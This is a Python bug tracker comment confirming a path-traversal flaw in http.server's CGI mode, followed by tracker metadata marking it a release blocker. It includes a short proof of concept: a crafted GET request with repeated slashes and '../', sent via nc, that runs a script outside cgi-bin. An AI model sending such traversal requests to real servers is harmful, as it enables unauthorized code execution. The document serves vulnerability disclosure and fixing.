Christian Heimes added the comment: I can confirm the issue:
$ mkdir www $ cd www $ cat << EOF > badscript.sh #!/bin/sh echo hacked EOF $ chmod +x badscript.sh $ ../python -m http.server --cgi $ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000 HTTP/1.0 200 Script output follows Server: SimpleHTTP/0.6 Python/3.4.0a4+ Date: Tue, 29 Oct 2013 16:47:22 GMT hacked ---------- assignee: -> christian.heimes nosy: +benjamin.peterson, georg.brandl, larry priority: normal -> release blocker stage: -> test needed versions: +Python 2.7, Python 3.3, Python 3.4 _______________________________________ Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue19435> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com